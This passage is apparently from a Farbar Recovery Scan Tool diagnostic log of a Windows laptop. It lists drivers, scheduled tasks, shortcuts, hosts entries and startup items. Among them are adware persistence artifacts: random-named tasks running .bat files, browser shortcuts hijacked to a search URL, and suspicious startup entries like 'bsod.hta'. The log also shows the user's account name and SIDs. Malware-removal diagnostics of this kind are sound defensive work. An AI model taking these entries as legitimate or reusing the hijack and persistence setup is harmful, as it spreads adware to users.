Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (08/21/2013 2.5.0.3) (HKLM\...\753B2CC50DC57D399D6A69B8563D5ABD5D9F24D3) (Version: 08/21/2013 2.5.0.3 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\02AD34F29D32C048B03F694998ED36AD51FD3A5E) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\5C4609FFB0CD6B7FB69EF6329744776215ADCA7B) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - ENE (EUCR) USB  (12/04/2009 5.89.0.64) (HKLM\...\7F973C87231D745EBF31E772CC38BB9B185D3819) (Version: 12/04/2009 5.89.0.64 - ENE)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices  (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012  - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\win64\npPlayerPlugin.dll (DIRECTV)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {060DD4D9-6920-4821-8A80-EFF6E5791AF4} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {110D4053-AA73-447C-B6B3-48CD31F6572B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {17C357AD-790B-4487-9EF3-85A67A824811} - System32\Tasks\{97B6A379-97C9-430F-B2E5-15B6C598AC3E} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.114.259/en/abandoninstall?page=tsGoogle&amp;installinfo=google-toolbar:offered-installed,google-chrome:notoffered;toolbaroffered
Task: {17CD11FE-A7DA-4D1F-A4CB-1090BBDFF29B} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {1C07BC4D-6C83-4929-8C27-27540D33FE03} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {1ED8626C-2400-4582-A967-F9A52267AE24} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat
Task: {3DF820E0-8F46-4EB1-B527-90FB60D07C89} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3E30049C-2379-44D4-8849-EEDC4325D38E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {44D3ABD7-2C48-49E1-BA82-77979369651E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {45990708-B34A-436F-BE29-9EA605DD416D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {45F5242B-C2FC-4454-9CF1-BE4671B59D6C} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {481D6FE8-8CD0-499D-AA02-DF3B8164C7D1} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {4F094485-564E-4476-86A4-BCFBCC9C239A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {55EE3DBF-57F8-4103-83B5-88720E7EEBD8} - System32\Tasks\{0E6FA772-6156-47E2-AE1D-5EE3A8A05AD9} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2013-07-25] (Skype Technologies S.A.)
Task: {5FDFFDC9-967D-4EDE-A7C3-BEE9A0C27400} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {65D5FB16-42C7-455F-9350-4764AE0293D0} - System32\Tasks\{E4FFFFE0-2787-4DAC-B105-2C808A1A2A4D} => pcalua.exe -a C:\Users\RoNiN\AppData\Local\Temp\jre-8u31-windows-au.exe -d C:\windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1
Task: {675E23A2-F0D8-4806-9687-F581BB0AC6B7} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6A490FA7-CA93-4214-B394-9AB008143C0D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {6B6A2BE2-8A42-4CCE-96D1-DCDE0AA16594} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {6CFB64B8-C96E-4505-B19D-05BFFFDB4366} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {7F54B173-73A7-455D-B8D3-05CDBEB04D24} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {81C671AC-4BCA-4B4C-B16A-DA9DC94B2032} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {869A0025-9207-4E47-A0E0-83ACF33323CB} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe
Task: {8FD417A1-EAB1-4416-AFED-D43B138420F6} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {974DD040-169D-46B7-B08A-60E9035DA668} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A7A740CC-1533-48ED-98D6-67AEE41F1954} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {A81D9481-C8A7-47F7-A447-0ACE98E4FAF4} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {AB264965-3447-457B-AC17-BEE07AFCF056} - System32\Tasks\Microsoft\Windows\Media Center\Extender\Update media permissions for Mcx1-RONIN-LAPTOP => C:\Windows\ehome\McxTask.exe
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
Task: {C6CF2B0F-A54A-4CCD-88C0-72501BA9267D} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {C84934AC-6228-4A08-9F09-7D7A54133B68} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C94198D0-0BC7-4528-B38A-B285C7D79AC0} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {CC2E5376-92DF-4854-8C3D-F54EED7D6667} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {CEAFA10F-5C90-45F6-BCFE-420DFC90526C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {DF294663-0E97-4583-81A3-6DA69DA846AC} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {ED1A577E-497C-4A70-998F-01B3E908FA9B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {FAAA50A7-6B6E-4A1A-B40E-B19F2672A919} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {FB119739-D5B0-4725-B8A1-6684820F96FB} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {FC5FE3D1-68A5-4CAD-84FC-0A61139E9C31} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a41ce5b91aa3166e\MightyText - SMS from PC & Text from Computer.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-07-09 23:33 - 2015-07-09 23:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00019640 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-10-31 17:47 - 2013-10-31 17:47 - 00954696 _____ () C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 02641760 _____ () C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentDeliveryManager.Background.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 02108256 _____ () C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentManagementSDK.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-09 04:52 - 2015-11-25 00:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 04:51 - 2015-11-25 00:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 04:52 - 2015-11-25 00:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2009-12-10 04:39 - 2008-09-19 04:03 - 00167936 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\LIBPQ.dll
2009-02-12 20:01 - 2006-11-06 19:18 - 00963584 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\libxml2.dll
2005-07-20 06:48 - 2005-07-20 07:48 - 00059904 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\zlib1.dll
2008-02-04 22:43 - 2008-02-04 23:43 - 00027136 _____ () C:\Program Files (x86)\PostgreSQL\8.3\lib\plugins\plugin_debugger.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00020792 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2016-02-10 21:59 - 2016-02-10 21:59 - 00170496 _____ () C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\IsdiInterop\c77312f309b32c7ba095241bb8fa6749\IsdiInterop.ni.dll
2010-06-18 01:06 - 2010-04-13 12:52 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-19 13:15 - 2016-03-11 19:16 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\RoNiN\Desktop\Pics\Taxi Driver Cinespia.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: 1198E835-A0AB-4C55-9629-D16AFAD406CB => 3
MSCONFIG\Services: 93530252-4B7E-48FF-9DAA-4D90DB571BBB => 3
MSCONFIG\Services: ACDaemon => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: APNMCP => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: AppxikenoZ => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BrsHelper => 2
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: CLDTVHNService => 2
MSCONFIG\Services: CloudPrinter => 2
MSCONFIG\Services: CltMngSvc => 2
MSCONFIG\Services: Dataup => 2
MSCONFIG\Services: dojygici => 2
MSCONFIG\Services: Ejuvde => 2
MSCONFIG\Services: ETDService => 2
MSCONFIG\Services: FirebirdServerMAGIXInstance => 3
MSCONFIG\Services: Gambali => 2
MSCONFIG\Services: groover110320162257 Updater => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Jhfuy => 2
MSCONFIG\Services: kBTNrls => 2
MSCONFIG\Services: McciCMService => 2
MSCONFIG\Services: McciCMService64 => 2
MSCONFIG\Services: MPCProtectService => 
MSCONFIG\Services: mwrc => 2
MSCONFIG\Services: Nijgatfy => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Service Mgr FindSearchWindow => 2
MSCONFIG\Services: shopperz130320161459 Updater => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SMUpd => 2
MSCONFIG\Services: SPBIUpd => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: Update Mgr FindSearchWindow => 2
MSCONFIG\Services: wdsvc => 2
MSCONFIG\Services: wrc => 2
MSCONFIG\Services: wucotusy => 2
MSCONFIG\Services: wugixojyzbt => 2
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\Services: zigipyro => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk => C:\windows\pss\Microsoft Office.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\RoNiN\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ArcSoft Connection Service => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
MSCONFIG\startupreg: Bing Bar => "C:\Program Files (x86)\MSN Toolbar\Platform\5.0.1423.0\mswinext.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: com.apple.dav.bookmarks.daemon => C:\Program Files (x86)\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: HP Photosmart 6510 series (NET) => "C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN1852217505QB:NW" -scfn "HP Photosmart 6510 series (NET)" -AutoStart 1
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Live Update 5 => C:\Program Files (x86)\MSI\Live Update 5\BootStartLiveupdate.exe /reminder
MSCONFIG\startupreg: Microsoft Default Manager => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: PCShowServer => "C:\Users\RoNiN\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: ShadowPlay => C:\windows\system32\rundll32.exe C:\windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SkyDrive => "C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe" /background
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Users\RoNiN\update\realsched.exe"  -osboot
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: UpdReg => C:\windows\UpdReg.EXE
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
HKLM\...\StartupApproved\StartupFolder: => "AllPCoptimizer.exe.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WebBrowserMixVideoPlayer.lnk"
HKLM\...\StartupApproved\Run: => "THXCfg64"
HKLM\...\StartupApproved\Run: => "IDSCPRODUCT"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "CitrixReceiver"
HKLM\...\StartupApproved\Run32: => "Rt45"
HKLM\...\StartupApproved\Run32: => "BSOD"
HKLM\...\StartupApproved\Run32: => "QwaT1"
HKLM\...\StartupApproved\Run32: => "QwaT4"
HKLM\...\StartupApproved\Run32: => "QwaT5"
HKLM\...\StartupApproved\Run32: => "QwaTgg"
HKLM\...\StartupApproved\Run32: => "QwaT22"
HKLM\...\StartupApproved\Run32: => "QwaT55"
HKLM\...\StartupApproved\Run32: => "QwaT21"
HKLM\...\StartupApproved\Run32: => "QwaT78"
HKLM\...\StartupApproved\Run32: => "QwaT"
HKLM\...\StartupApproved\Run32: => "Rty01"
HKLM\...\StartupApproved\Run32: => "cpx"
HKLM\...\StartupApproved\Run32: => "Rt562@"
HKLM\...\StartupApproved\Run32: => "mpck_en_005030264"
HKLM\...\StartupApproved\Run32: => "msrtn32"
HKLM\...\StartupApproved\Run32: => "ospd_us_037010264"
HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "rec_en_222"
HKLM\...\StartupApproved\Run32: => "rec_en_224"
HKLM\...\StartupApproved\Run32: => "rst"
HKLM\...\StartupApproved\Run32: => "sun13"
HKLM\...\StartupApproved\Run32: => "TV"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "Storm Alerts.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "StormAlertsApp.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "SideSync"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "wdbext"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "Windi"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{354199B7-F83D-495C-9D2C-3BA29A4920A5}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{10D8A433-FF54-408D-BD19-8ECAF71549D1}] => (Allow) %systemroot%\system32\mqsvc.exe
